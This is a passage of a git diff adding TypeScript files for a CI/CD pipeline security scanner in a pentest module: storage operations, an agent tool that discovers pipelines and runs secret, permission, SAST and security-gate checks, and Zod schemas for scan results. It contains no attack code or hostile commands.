+          const data = await Storage.read<CICDTypes.CICDScanResult>(key)
+          if (data) {
+            scans.push(CICDTypes.CICDScanResult.parse(data))
+          }
+        } catch {
+          log.warn("Failed to parse scan file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.target) {
+      scans = scans.filter((s) => s.target === filters.target)
+    }
+    if (filters?.profile) {
+      scans = scans.filter((s) => s.profile === filters.profile)
+    }
+    if (filters?.status) {
+      scans = scans.filter((s) => s.status === filters.status)
+    }
+
+    // Sort newest first
+    scans.sort((a, b) => b.startedAt - a.startedAt)
+
+    if (filters?.limit) {
+      scans = scans.slice(0, filters.limit)
+    }
+
+    return scans
+  }
+
+  /** Delete a scan */
+  export async function deleteScan(id: string, config: StorageConfig = {}): Promise<boolean> {
+    if (config.storage === "memory") {
+      const idx = scanBuffer.findIndex((s) => s.id === id)
+      if (idx >= 0) {
+        scanBuffer.splice(idx, 1)
+        return true
+      }
+      return false
+    }
+
+    try {
+      await Storage.remove(["pentest", "cicd", "scans", id])
+      return true
+    } catch {
+      return false
+    }
+  }
+
+  // ===== PIPELINE OPERATIONS =====
+
+  /** Save a pipeline configuration */
+  export async function savePipeline(
+    pipeline: Omit<CICDTypes.PipelineConfig, "id"> | CICDTypes.PipelineConfig,
+    config: StorageConfig = {}
+  ): Promise<CICDTypes.PipelineConfig> {
+    const full: CICDTypes.PipelineConfig = {
+      ...pipeline,
+      id: "id" in pipeline && pipeline.id ? pipeline.id : `pipeline_${Date.now().toString(36)}`,
+    }
+    const validated = CICDTypes.PipelineConfig.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = pipelineBuffer.findIndex((p) => p.id === validated.id)
+      if (existingIdx >= 0) {
+        pipelineBuffer[existingIdx] = validated
+      } else {
+        pipelineBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "cicd", "pipelines", validated.id], validated)
+    }
+
+    return validated
+  }
+
+  /** Get a pipeline by ID */
+  export async function getPipeline(
+    id: string,
+    config: StorageConfig = {}
+  ): Promise<CICDTypes.PipelineConfig | null> {
+    try {
+      if (config.storage === "memory") {
+        return pipelineBuffer.find((p) => p.id === id) || null
+      }
+
+      const data = await Storage.read<CICDTypes.PipelineConfig>(["pentest", "cicd", "pipelines", id])
+      if (!data) return null
+
+      return CICDTypes.PipelineConfig.parse(data)
+    } catch {
+      return null
+    }
+  }
+
+  /** List pipelines by target */
+  export async function listPipelines(
+    config: StorageConfig = {},
+    filters?: {
+      provider?: CICDTypes.Provider
+      limit?: number
+    }
+  ): Promise<CICDTypes.PipelineConfig[]> {
+    let pipelines: CICDTypes.PipelineConfig[]
+
+    if (config.storage === "memory") {
+      pipelines = [...pipelineBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "cicd", "pipelines"])
+      pipelines = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<CICDTypes.PipelineConfig>(key)
+          if (data) {
+            pipelines.push(CICDTypes.PipelineConfig.parse(data))
+          }
+        } catch {
+          log.warn("Failed to parse pipeline file", { key })
+        }
+      }
+    }
+
+    if (filters?.provider) {
+      pipelines = pipelines.filter((p) => p.provider === filters.provider)
+    }
+
+    if (filters?.limit) {
+      pipelines = pipelines.slice(0, filters.limit)
+    }
+
+    return pipelines
+  }
+
+  // ===== FINDING OPERATIONS =====
+
+  /** Create a finding */
+  export async function createFinding(
+    finding: Omit<CICDTypes.CICDFinding, "id" | "foundAt">,
+    config: StorageConfig = {}
+  ): Promise<CICDTypes.CICDFinding> {
+    const full: CICDTypes.CICDFinding = {
+      ...finding,
+      id: generateFindingId(),
+      foundAt: Date.now(),
+    }
+    const validated = CICDTypes.CICDFinding.parse(full)
+
+    if (config.storage === "memory") {
+      findingBuffer.push(validated)
+    } else {
+      await Storage.write(["pentest", "cicd", "findings", validated.id], validated)
+    }
+
+    return validated
+  }
+
+  /** Get a finding by ID */
+  export async function getFinding(
+    id: string,
+    config: StorageConfig = {}
+  ): Promise<CICDTypes.CICDFinding | null> {
+    try {
+      if (config.storage === "memory") {
+        return findingBuffer.find((f) => f.id === id) || null
+      }
+
+      const data = await Storage.read<CICDTypes.CICDFinding>(["pentest", "cicd", "findings", id])
+      if (!data) return null
+
+      return CICDTypes.CICDFinding.parse(data)
+    } catch {
+      return null
+    }
+  }
+
+  /** List findings with filters */
+  export async function listFindings(
+    config: StorageConfig = {},
+    filters?: {
+      category?: CICDTypes.FindingCategory
+      severity?: CICDTypes.Severity
+      file?: string
+      limit?: number
+    }
+  ): Promise<CICDTypes.CICDFinding[]> {
+    let findings: CICDTypes.CICDFinding[]
+
+    if (config.storage === "memory") {
+      findings = [...findingBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "cicd", "findings"])
+      findings = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<CICDTypes.CICDFinding>(key)
+          if (data) {
+            findings.push(CICDTypes.CICDFinding.parse(data))
+          }
+        } catch {
+          log.warn("Failed to parse finding file", { key })
+        }
+      }
+    }
+
+    if (filters?.category) {
+      findings = findings.filter((f) => f.category === filters.category)
+    }
+    if (filters?.severity) {
+      findings = findings.filter((f) => f.severity === filters.severity)
+    }
+    if (filters?.file) {
+      findings = findings.filter((f) => f.file === filters.file)
+    }
+
+    // Sort by severity (critical first) then by time
+    const severityOrder = { critical: 0, high: 1, medium: 2, low: 3, info: 4 }
+    findings.sort((a, b) => {
+      const sevDiff = severityOrder[a.severity] - severityOrder[b.severity]
+      if (sevDiff !== 0) return sevDiff
+      return b.foundAt - a.foundAt
+    })
+
+    if (filters?.limit) {
+      findings = findings.slice(0, filters.limit)
+    }
+
+    return findings
+  }
+
+  // ===== TEST UTILITIES =====
+
+  /** Clear all in-memory buffers (for testing) */
+  export function clearMemory(): void {
+    scanBuffer.length = 0
+    pipelineBuffer.length = 0
+    findingBuffer.length = 0
+  }
+
+  /** Get memory buffer counts */
+  export function memoryCount(): { scans: number; pipelines: number; findings: number } {
+    return {
+      scans: scanBuffer.length,
+      pipelines: pipelineBuffer.length,
+      findings: findingBuffer.length,
+    }
+  }
+
+  /** Generate IDs (exported for external use) */
+  export const generateId = {
+    scan: generateScanId,
+    finding: generateFindingId,
+  }
+}
diff --git a/packages/opencode/src/pentest/cicd/tool.ts b/packages/opencode/src/pentest/cicd/tool.ts
new file mode 100644
index 00000000000..46bf820242a
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/tool.ts
@@ -0,0 +1,509 @@
+/**
+ * @fileoverview CI/CD Security Scanner Agent Tool
+ *
+ * Agent-facing tool definition for CI/CD pipeline security scanning.
+ */
+
+import { z } from "zod"
+import { Tool } from "../../tool/tool"
+import { CICDTypes } from "./types"
+import { CICDProfiles } from "./profiles"
+import { CICDOrchestrator } from "./orchestrator"
+import { SecurityGates } from "./gates"
+import { SecretsCheck } from "./checks/secrets"
+import { PermissionsCheck } from "./checks/permissions"
+import { SASTOrchestrator } from "./sast"
+import { CICDStorage } from "./storage"
+
+export const CICDTool = Tool.define("cicd", async () => {
+  return {
+    description: `CI/CD pipeline security scanner for GitHub Actions, GitLab CI, and Jenkins.
+
+ACTIONS:
+- discover: Discover CI/CD pipelines in a repository
+- scan: Run full security scan with specified profile
+- check-secrets: Run secret detection only
+- check-permissions: Run permission analysis only
+- sast: Run SAST tools (semgrep, gitleaks)
+- gate: Evaluate security gate for a scan
+- status: Get status of a scan
+- profiles: List available scan profiles
+- findings: List findings from a scan
+
+PROFILES:
+- discovery: Enumerate pipelines only (no active testing)
+- quick: Fast assessment (secrets + permissions)
+- standard: Balanced scan with all checks and gate
+- thorough: Full audit with SAST integration
+- compliance: Regulatory compliance focused
+
+EXAMPLES:
+  cicd discover target="/path/to/repo"
+  cicd scan target="/path/to/repo" profile="standard"
+  cicd check-secrets target="/path/to/repo"
+  cicd sast target="/path/to/repo" tools=["semgrep","gitleaks"]
+  cicd gate scanId="cicd_xxx"`,
+
+    parameters: z.object({
+      action: z.enum([
+        "discover",
+        "scan",
+        "check-secrets",
+        "check-permissions",
+        "sast",
+        "gate",
+        "status",
+        "profiles",
+        "findings",
+      ]),
+      target: z.string().optional().describe("Target directory to scan"),
+      profile: z
+        .enum(["discovery", "quick", "standard", "thorough", "compliance"])
+        .optional()
+        .describe("Scan profile to use"),
+      scanId: z.string().optional().describe("Scan ID for status/gate actions"),
+      tools: z
+        .array(z.enum(["semgrep", "gitleaks"]))
+        .optional()
+        .describe("SAST tools to run"),
+      providers: z
+        .array(z.enum(["github", "gitlab", "jenkins", "azure", "circleci"]))
+        .optional()
+        .describe("CI/CD providers to scan"),
+      limit: z.number().optional().describe("Limit number of results"),
+    }),
+
+    async execute(params): Promise<{
+      title: string
+      output: string
+      metadata: Record<string, unknown>
+    }> {
+      const makeResult = (
+        title: string,
+        output: string,
+        metadata: Record<string, unknown> = {}
+      ) => ({
+        title,
+        output,
+        metadata,
+      })
+
+      switch (params.action) {
+        case "profiles":
+          return makeResult(
+            "CI/CD Scan Profiles",
+            CICDProfiles.formatTable()
+          )
+
+        case "discover": {
+          if (!params.target) {
+            return makeResult(
+              "Discover CI/CD Pipelines",
+              "Error: target is required for discover action"
+            )
+          }
+
+          const result = await CICDOrchestrator.discover(
+            params.target,
+            params.providers as CICDTypes.Provider[]
+          )
+
+          const output = formatDiscoveryResult(result)
+
+          return makeResult("Discover CI/CD Pipelines", output, {
+            pipelinesFound: result.pipelines.length,
+            providers: result.providers,
+          })
+        }
+
+        case "scan": {
+          if (!params.target) {
+            return makeResult(
+              "CI/CD Security Scan",
+              "Error: target is required for scan action"
+            )
+          }
+
+          const result = await CICDOrchestrator.scan(params.target, {
+            profile: params.profile as CICDTypes.ProfileId,
+            providers: params.providers as CICDTypes.Provider[],
+          })
+
+          return makeResult(
+            "CI/CD Security Scan",
+            CICDOrchestrator.formatResult(result),
+            {
+              scanId: result.id,
+              status: result.status,
+              findings: result.stats.findingsCount,
+              critical: result.stats.criticalCount,
+              high: result.stats.highCount,
+              gateStatus: result.gateResult?.status,
+            }
+          )
+        }
+
+        case "check-secrets": {
+          if (!params.target) {
+            return makeResult(
+              "Secret Detection",
+              "Error: target is required for check-secrets action"
+            )
+          }
+
+          // Discover pipelines first
+          const discovery = await CICDOrchestrator.discover(
+            params.target,
+            params.providers as CICDTypes.Provider[]
+          )
+
+          let totalSecrets = 0
+          const allFindings: CICDTypes.SecretFinding[] = []
+
+          for (const pipeline of discovery.pipelines) {
+            const result = SecretsCheck.detect(
+              pipeline.raw || "",
+              pipeline.path
+            )
+            totalSecrets += result.secretsFound
+            allFindings.push(...result.findings)
+          }
+
+          return makeResult(
+            "Secret Detection",
+            formatSecretFindings(allFindings),
+            {
+              pipelinesScanned: discovery.pipelines.length,
+              secretsFound: totalSecrets,
+            }
+          )
+        }
+
+        case "check-permissions": {
+          if (!params.target) {
+            return makeResult(
+              "Permission Analysis",
+              "Error: target is required for check-permissions action"
+            )
+          }
+
+          const discovery = await CICDOrchestrator.discover(
+            params.target,
+            params.providers as CICDTypes.Provider[]
+          )
+
+          let totalIssues = 0
+          const allFindings: CICDTypes.CICDFinding[] = []
+
+          for (const pipeline of discovery.pipelines) {
+            const result = PermissionsCheck.analyze(pipeline)
+            totalIssues += result.riskyPermissions
+            allFindings.push(...result.findings)
+          }
+
+          return makeResult(
+            "Permission Analysis",
+            formatPermissionFindings(allFindings),
+            {
+              pipelinesScanned: discovery.pipelines.length,
+              permissionIssues: totalIssues,
+            }
+          )
+        }
+
+        case "sast": {
+          if (!params.target) {
+            return makeResult(
+              "SAST Analysis",
+              "Error: target is required for sast action"
+            )
+          }
+
+          const tools = (params.tools || ["gitleaks"]) as CICDTypes.SASTTool[]
+
+          // Check availability first
+          const availability = await SASTOrchestrator.checkAvailability()
+          const unavailable = tools.filter((t) => !availability[t])
+
+          if (unavailable.length > 0) {
+            return makeResult(
+              "SAST Analysis",
+              `Warning: The following tools are not installed: ${unavailable.join(", ")}\n\n` +
+              `To install:\n` +
+              `- semgrep: pip install semgrep\n` +
+              `- gitleaks: brew install gitleaks (or download from GitHub)`
+            )
+          }
+
+          const result = await SASTOrchestrator.run({
+            tools,
+            target: params.target,
+          })
+
+          return makeResult("SAST Analysis", formatSASTResult(result), {
+            toolsRun: result.stats.toolsRun,
+            findings: result.stats.totalFindings,
+          })
+        }
+
+        case "gate": {
+          if (!params.scanId) {
+            return makeResult(
+              "Security Gate Evaluation",
+              "Error: scanId is required for gate action"
+            )
+          }
+
+          const scan = await CICDStorage.getScan(params.scanId)
+          if (!scan) {
+            return makeResult(
+              "Security Gate Evaluation",
+              `Scan ${params.scanId} not found`
+            )
+          }
+
+          const gateResult = await SecurityGates.evaluate(scan.findings)
+
+          return makeResult(
+            "Security Gate Evaluation",
+            SecurityGates.formatResult(gateResult),
+            {
+              scanId: params.scanId,
+              status: gateResult.status,
+              passed: gateResult.passed,
+            }
+          )
+        }
+
+        case "status": {
+          if (!params.scanId) {
+            return makeResult(
+              "Scan Status",
+              "Error: scanId is required for status action"
+            )
+          }
+
+          const scan = await CICDStorage.getScan(params.scanId)
+          if (!scan) {
+            return makeResult("Scan Status", `Scan ${params.scanId} not found`)
+          }
+
+          return makeResult(
+            "Scan Status",
+            CICDOrchestrator.formatResult(scan),
+            {
+              scanId: params.scanId,
+              status: scan.status,
+              findings: scan.stats.findingsCount,
+            }
+          )
+        }
+
+        case "findings": {
+          if (!params.scanId) {
+            return makeResult(
+              "Scan Findings",
+              "Error: scanId is required for findings action"
+            )
+          }
+
+          const scan = await CICDStorage.getScan(params.scanId)
+          if (!scan) {
+            return makeResult("Scan Findings", `Scan ${params.scanId} not found`)
+          }
+
+          const limit = params.limit || 50
+          const findings = scan.findings.slice(0, limit)
+
+          return makeResult(
+            "Scan Findings",
+            formatFindings(findings, scan.findings.length),
+            {
+              scanId: params.scanId,
+              totalFindings: scan.findings.length,
+              displayed: findings.length,
+            }
+          )
+        }
+
+        default:
+          return makeResult(
+            "Unknown Action",
+            `Unknown action: ${params.action}. Supported actions: discover, scan, check-secrets, check-permissions, sast, gate, status, profiles, findings`
+          )
+      }
+    },
+  }
+})
+
+/** Format discovery result */
+function formatDiscoveryResult(
+  result: Awaited<ReturnType<typeof CICDOrchestrator.discover>>
+): string {
+  const lines: string[] = []
+
+  lines.push("CI/CD Pipeline Discovery")
+  lines.push("=".repeat(50))
+  lines.push("")
+
+  if (result.pipelines.length === 0) {
+    lines.push("No CI/CD pipelines found.")
+    return lines.join("\n")
+  }
+
+  lines.push(`Found ${result.pipelines.length} pipeline(s):`)
+  lines.push("")
+
+  for (const pipeline of result.pipelines) {
+    lines.push(`[${pipeline.provider.toUpperCase()}] ${pipeline.name}`)
+    lines.push(`  Path: ${pipeline.path}`)
+    lines.push(`  Jobs: ${pipeline.jobs.length}`)
+    lines.push(`  Actions: ${pipeline.actions.length}`)
+    lines.push(`  Secrets: ${pipeline.secrets.length}`)
+    lines.push("")
+  }
+
+  if (result.errors.length > 0) {
+    lines.push("Warnings:")
+    for (const error of result.errors) {
+      lines.push(`  - ${error}`)
+    }
+  }
+
+  return lines.join("\n")
+}
+
+/** Format secret findings */
+function formatSecretFindings(findings: CICDTypes.SecretFinding[]): string {
+  const lines: string[] = []
+
+  lines.push("Secret Detection Results")
+  lines.push("=".repeat(50))
+  lines.push("")
+
+  if (findings.length === 0) {
+    lines.push("No secrets detected.")
+    return lines.join("\n")
+  }
+
+  lines.push(`Found ${findings.length} potential secret(s):`)
+  lines.push("")
+
+  for (const finding of findings) {
+    lines.push(`[${finding.severity.toUpperCase()}] ${finding.patternName}`)
+    lines.push(`  File: ${finding.file}:${finding.line}`)
+    lines.push(`  Match: ${finding.redacted}`)
+    if (finding.entropy !== undefined) {
+      lines.push(`  Entropy: ${finding.entropy.toFixed(2)}`)
+    }
+    lines.push("")
+  }
+
+  return lines.join("\n")
+}
+
+/** Format permission findings */
+function formatPermissionFindings(findings: CICDTypes.CICDFinding[]): string {
+  const lines: string[] = []
+
+  lines.push("Permission Analysis Results")
+  lines.push("=".repeat(50))
+  lines.push("")
+
+  if (findings.length === 0) {
+    lines.push("No permission issues found.")
+    return lines.join("\n")
+  }
+
+  lines.push(`Found ${findings.length} permission issue(s):`)
+  lines.push("")
+
+  for (const finding of findings) {
+    lines.push(`[${finding.severity.toUpperCase()}] ${finding.title}`)
+    lines.push(`  ${finding.description}`)
+    lines.push(`  File: ${finding.file}`)
+    if (finding.remediation) {
+      lines.push(`  Fix: ${finding.remediation.split("\n")[0]}`)
+    }
+    lines.push("")
+  }
+
+  return lines.join("\n")
+}
+
+/** Format SAST result */
+function formatSASTResult(
+  result: Awaited<ReturnType<typeof SASTOrchestrator.run>>
+): string {
+  const lines: string[] = []
+
+  lines.push("SAST Analysis Results")
+  lines.push("=".repeat(50))
+  lines.push("")
+
+  lines.push(`Tools Run: ${result.stats.toolsRun}`)
+  lines.push(`Tools Succeeded: ${result.stats.toolsSucceeded}`)
+  lines.push(`Total Findings: ${result.stats.totalFindings}`)
+  lines.push(`Duration: ${(result.stats.duration / 1000).toFixed(1)}s`)
+  lines.push("")
+
+  if (result.errors.length > 0) {
+    lines.push("Errors:")
+    for (const error of result.errors) {
+      lines.push(`  - ${error}`)
+    }
+    lines.push("")
+  }
+
+  if (result.findings.length > 0) {
+    lines.push("Findings:")
+    for (const finding of result.findings.slice(0, 20)) {
+      lines.push(`  [${finding.severity.toUpperCase()}] ${finding.title}`)
+      lines.push(`    File: ${finding.file}:${finding.line || 1}`)
+    }
+
+    if (result.findings.length > 20) {
+      lines.push(`  ... and ${result.findings.length - 20} more`)
+    }
+  }
+
+  return lines.join("\n")
+}
+
+/** Format findings list */
+function formatFindings(
+  findings: CICDTypes.CICDFinding[],
+  total: number
+): string {
+  const lines: string[] = []
+
+  lines.push("Scan Findings")
+  lines.push("=".repeat(50))
+  lines.push("")
+
+  if (findings.length === 0) {
+    lines.push("No findings.")
+    return lines.join("\n")
+  }
+
+  lines.push(`Showing ${findings.length} of ${total} findings:`)
+  lines.push("")
+
+  // Sort by severity
+  const sorted = [...findings].sort((a, b) => {
+    const order = { critical: 0, high: 1, medium: 2, low: 3, info: 4 }
+    return order[a.severity] - order[b.severity]
+  })
+
+  for (const finding of sorted) {
+    lines.push(`[${finding.severity.toUpperCase()}] ${finding.title}`)
+    lines.push(`  Category: ${finding.category}`)
+    lines.push(`  File: ${finding.file}${finding.line ? `:${finding.line}` : ""}`)
+    if (finding.description) {
+      lines.push(`  ${finding.description.slice(0, 100)}${finding.description.length > 100 ? "..." : ""}`)
+    }
+    lines.push("")
+  }
+
+  return lines.join("\n")
+}
diff --git a/packages/opencode/src/pentest/cicd/types.ts b/packages/opencode/src/pentest/cicd/types.ts
new file mode 100644
index 00000000000..3b28cf26911
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/types.ts
@@ -0,0 +1,578 @@
+/**
+ * @fileoverview CI/CD Security Scanner Types
+ *
+ * Zod schemas for CI/CD pipeline security scanning including
+ * GitHub Actions, GitLab CI, Jenkins, Azure DevOps, and CircleCI.
+ */
+
+import { z } from "zod"
+
+export namespace CICDTypes {
+  // ===== ENUMS =====
+
+  /** Supported CI/CD providers */
+  export const Provider = z.enum(["github", "gitlab", "jenkins", "azure", "circleci"])
+  export type Provider = z.infer<typeof Provider>
+
+  /** Finding severity levels */
+  export const Severity = z.enum(["critical", "high", "medium", "low", "info"])
+  export type Severity = z.infer<typeof Severity>
+
+  /** Finding categories */
+  export const FindingCategory = z.enum([
+    "secrets",
+    "permissions",
+    "injection",
+    "dependency",
+    "artifact",
+    "runner",
+    "supply-chain",
+    "misconfiguration",
+  ])
+  export type FindingCategory = z.infer<typeof FindingCategory>
+
+  /** Security gate status */
+  export const GateStatus = z.enum(["pass", "fail", "warn", "skip"])
+  export type GateStatus = z.infer<typeof GateStatus>
+
+  /** Scan status */
+  export const Status = z.enum(["pending", "running", "completed", "failed", "stopped"])
+  export type Status = z.infer<typeof Status>
+
+  /** Profile IDs */
+  export const ProfileId = z.enum(["discovery", "quick", "standard", "thorough", "compliance"])
+  export type ProfileId = z.infer<typeof ProfileId>
+
+  /** SAST tool types */
+  export const SASTTool = z.enum(["semgrep", "gitleaks", "trufflehog", "codeql"])
+  export type SASTTool = z.infer<typeof SASTTool>
+
+  // ===== SECRET DETECTION =====
+
+  /** Secret pattern for detection */
+  export const SecretPattern = z.object({
+    id: z.string(),
+    name: z.string(),
+    pattern: z.string(),
+    severity: Severity,
+    description: z.string().optional(),
+  })
+  export type SecretPattern = z.infer<typeof SecretPattern>
+
+  /** Detected secret reference */
+  export const SecretReference = z.object({
+    name: z.string(),
+    source: z.enum(["env", "file", "hardcoded", "variable"]),
+    location: z.string().optional(),
+    line: z.number().optional(),
+    exposed: z.boolean().default(false),
+    exposureRisk: z.string().optional(),
+  })
+  export type SecretReference = z.infer<typeof SecretReference>
+
+  /** Secret detection result */
+  export const SecretFinding = z.object({
+    id: z.string(),
+    patternId: z.string(),
+    patternName: z.string(),
+    file: z.string(),
+    line: z.number(),
+    column: z.number().optional(),
+    match: z.string(),
+    redacted: z.string(),
+    entropy: z.number().optional(),
+    severity: Severity,
+    context: z.string().optional(),
+  })
+  export type SecretFinding = z.infer<typeof SecretFinding>
+
+  // ===== PERMISSIONS =====
+
+  /** Permission scope */
+  export const PermissionScope = z.enum([
+    "read",
+    "write",
+    "admin",
+    "none",
+    "read-all",
+    "write-all",
+  ])
+  export type PermissionScope = z.infer<typeof PermissionScope>
+
+  /** Individual permission */
+  export const Permission = z.object({
+    resource: z.string(),
+    scope: PermissionScope,
+    location: z.string().optional(),
+    line: z.number().optional(),
+    inherited: z.boolean().default(false),
+    risky: z.boolean().default(false),
+    reason: z.string().optional(),
+  })
+  export type Permission = z.infer<typeof Permission>
+
+  /** Permission analysis result */
+  export const PermissionAnalysis = z.object({
+    defaultPermissions: z.string().optional(),
+    jobPermissions: z.array(z.object({
+      job: z.string(),
+      permissions: z.array(Permission),
+    })).default([]),
+    findings: z.array(z.string()).default([]),
+    score: z.number().min(0).max(100).optional(),
+  })
+  export type PermissionAnalysis = z.infer<typeof PermissionAnalysis>
+
+  // ===== INJECTION RISKS =====
+
+  /** Injection vector */
+  export const InjectionVector = z.object({
+    type: z.enum(["command", "script", "environment", "expression"]),
+    source: z.string(),
+    sink: z.string(),
+    file: z.string(),
+    line: z.number(),
+    context: z.string().optional(),
+    severity: Severity,
+    exploitable: z.boolean().default(false),
+    payload: z.string().optional(),
+  })
+  export type InjectionVector = z.infer<typeof InjectionVector>
+
+  // ===== SUPPLY CHAIN =====
+
+  /** Action/dependency reference */
+  export const ActionReference = z.object({
+    name: z.string(),
+    version: z.string().optional(),
+    sha: z.string().optional(),
+    pinned: z.boolean().default(false),
+    trusted: z.boolean().default(false),
+    file: z.string(),
+    line: z.number(),
+    official: z.boolean().default(false),
+  })
+  export type ActionReference = z.infer<typeof ActionReference>
+
+  /** Supply chain finding */
+  export const SupplyChainFinding = z.object({
+    id: z.string(),
+    type: z.enum(["unpinned-action", "untrusted-action", "outdated-action", "vulnerable-dependency"]),
+    action: ActionReference,
+    severity: Severity,
+    recommendation: z.string(),
+  })
+  export type SupplyChainFinding = z.infer<typeof SupplyChainFinding>
+
+  // ===== PIPELINE CONFIGURATION =====
+
+  /** Pipeline step/task */
+  export const PipelineStep = z.object({
+    id: z.string(),
+    name: z.string(),
+    type: z.enum(["run", "uses", "script", "shell", "task", "checkout"]),
+    command: z.string().optional(),
+    action: z.string().optional(),
+    env: z.record(z.string(), z.string()).default({}),
+    secrets: z.array(z.string()).default([]),
+    inputs: z.record(z.string(), z.string()).default({}),
+    line: z.number().optional(),
+  })
+  export type PipelineStep = z.infer<typeof PipelineStep>
+
+  /** Pipeline job */
+  export const PipelineJob = z.object({
+    id: z.string(),
+    name: z.string(),
+    runsOn: z.string().optional(),
+    container: z.string().optional(),
+    permissions: z.array(Permission).default([]),
+    steps: z.array(PipelineStep).default([]),
+    env: z.record(z.string(), z.string()).default({}),
+    secrets: z.array(z.string()).default([]),
+    needs: z.array(z.string()).default([]),
+    condition: z.string().optional(),
+    line: z.number().optional(),
+  })
+  export type PipelineJob = z.infer<typeof PipelineJob>
+
+  /** Pipeline trigger */
+  export const PipelineTrigger = z.object({
+    type: z.enum(["push", "pull_request", "schedule", "workflow_dispatch", "workflow_call", "release", "manual", "merge_request", "pipeline", "commit"]),
+    branches: z.array(z.string()).default([]),
+    paths: z.array(z.string()).default([]),
+    config: z.record(z.string(), z.unknown()).default({}),
+  })
+  export type PipelineTrigger = z.infer<typeof PipelineTrigger>
+
+  /** Full pipeline configuration */
+  export const PipelineConfig = z.object({
+    id: z.string(),
+    provider: Provider,
+    name: z.string(),
+    path: z.string(),
+    raw: z.string().optional(),
+    triggers: z.array(PipelineTrigger).default([]),
+    jobs: z.array(PipelineJob).default([]),
+    secrets: z.array(SecretReference).default([]),
+    permissions: z.array(Permission).default([]),
+    env: z.record(z.string(), z.string()).default({}),
+    actions: z.array(ActionReference).default([]),
+    parsedAt: z.number().optional(),
+    parseErrors: z.array(z.string()).default([]),
+  })
+  export type PipelineConfig = z.infer<typeof PipelineConfig>
+
+  // ===== FINDINGS =====
+
+  /** CI/CD security finding */
+  export const CICDFinding = z.object({
+    id: z.string(),
+    category: FindingCategory,
+    severity: Severity,
+    title: z.string(),
+    description: z.string(),
+    file: z.string(),
+    line: z.number().optional(),
+    column: z.number().optional(),
+    provider: Provider.optional(),
+    pipeline: z.string().optional(),
+    job: z.string().optional(),
+    step: z.string().optional(),
+    evidence: z.string().optional(),
+    remediation: z.string().optional(),
+    references: z.array(z.string()).default([]),
+    cwe: z.string().optional(),
+    falsePositive: z.boolean().default(false),
+    suppressed: z.boolean().default(false),
+    foundAt: z.number(),
+  })
+  export type CICDFinding = z.infer<typeof CICDFinding>
+
+  // ===== SAST RESULTS =====
+
+  /** SAST finding */
+  export const SASTFinding = z.object({
+    id: z.string(),
+    tool: SASTTool,
+    ruleId: z.string(),
+    ruleName: z.string().optional(),
+    severity: Severity,
+    message: z.string(),
+    file: z.string(),
+    startLine: z.number(),
+    endLine: z.number().optional(),
+    startColumn: z.number().optional(),
+    endColumn: z.number().optional(),
+    snippet: z.string().optional(),
+    fix: z.string().optional(),
+    metadata: z.record(z.string(), z.unknown()).default({}),
+  })
+  export type SASTFinding = z.infer<typeof SASTFinding>
+
+  /** SAST scan result */
+  export const SASTResult = z.object({
+    tool: SASTTool,
+    version: z.string().optional(),
+    findings: z.array(SASTFinding).default([]),
+    stats: z.object({
+      filesScanned: z.number().default(0),
+      rulesRun: z.number().default(0),
+      findingsCount: z.number().default(0),
+      duration: z.number().default(0),
+    }),
+    errors: z.array(z.string()).default([]),
+    completedAt: z.number(),
+  })
+  export type SASTResult = z.infer<typeof SASTResult>
+
+  // ===== SECURITY GATE =====
+
+  /** Gate rule */
+  export const GateRule = z.object({
+    id: z.string(),
+    category: FindingCategory.optional(),
+    severity: Severity.optional(),
+    action: z.enum(["fail", "warn", "skip"]),
+    threshold: z.number().optional(),
+    description: z.string().optional(),
+  })
+  export type GateRule = z.infer<typeof GateRule>
+
+  /** Gate configuration */
+  export const GateConfig = z.object({
+    enabled: z.boolean().default(true),
+    blockOnCritical: z.boolean().default(true),
+    blockOnHigh: z.boolean().default(false),
+    maxCritical: z.number().default(0),
+    maxHigh: z.number().default(5),
+    maxMedium: z.number().default(20),
+    maxLow: z.number().default(100),
+    rules: z.array(GateRule).default([]),
+  })
+  export type GateConfig = z.infer<typeof GateConfig>
+
+  /** Gate evaluation result */
+  export const GateResult = z.object({
+    status: GateStatus,
+    passed: z.boolean(),
+    message: z.string(),
+    rulesEvaluated: z.number(),
+    rulesPassed: z.number(),
+    rulesFailed: z.number(),
+    rulesWarned: z.number(),
+    details: z.array(z.object({
+      ruleId: z.string(),
+      status: GateStatus,
+      message: z.string(),
+      findings: z.number(),
+    })).default([]),
+    evaluatedAt: z.number(),
+  })
+  export type GateResult = z.infer<typeof GateResult>
+
+  // ===== SCAN PROFILES =====
+
+  /** Check configuration */
+  export const CheckConfig = z.object({
+    secrets: z.boolean().default(true),
+    permissions: z.boolean().default(true),
+    injection: z.boolean().default(true),
+    supplyChain: z.boolean().default(true),
+    misconfiguration: z.boolean().default(true),
+  })
+  export type CheckConfig = z.infer<typeof CheckConfig>
+
+  /** SAST configuration */
+  export const SASTConfig = z.object({
+    enabled: z.boolean().default(false),
+    tools: z.array(SASTTool).default([]),
+    timeout: z.number().default(300000),
+    excludePaths: z.array(z.string()).default([]),
+  })
+  export type SASTConfig = z.infer<typeof SASTConfig>
+
+  /** Scan profile */
+  export const ScanProfile = z.object({
+    id: ProfileId,
+    name: z.string(),
+    description: z.string(),
+    checks: CheckConfig,
+    sast: SASTConfig,
+    gate: z.boolean().default(false),
+    gateConfig: GateConfig.optional(),
+    timeout: z.number().default(60000),
+    maxFindings: z.number().default(1000),
+  })
+  export type ScanProfile = z.infer<typeof ScanProfile>
+
+  // ===== SCAN STATISTICS =====
+
+  /** Scan statistics */
+  export const ScanStats = z.object({
+    pipelinesDiscovered: z.number().default(0),
+    pipelinesScanned: z.number().default(0),
+    jobsAnalyzed: z.number().default(0),
+    stepsAnalyzed: z.number().default(0),
+    secretsChecked: z.number().default(0),
+    permissionsChecked: z.number().default(0),
+    actionsAnalyzed: z.number().default(0),
+    findingsCount: z.number().default(0),
+    criticalCount: z.number().default(0),
+    highCount: z.number().default(0),
+    mediumCount: z.number().default(0),
+    lowCount: z.number().default(0),
+    infoCount: z.number().default(0),
+    suppressedCount: z.number().default(0),
+    duration: z.number().default(0),
+  })
+  export type ScanStats = z.infer<typeof ScanStats>
+
+  // ===== SCAN RESULT =====
+
+  /** CI/CD scan result */
+  export const CICDScanResult = z.object({
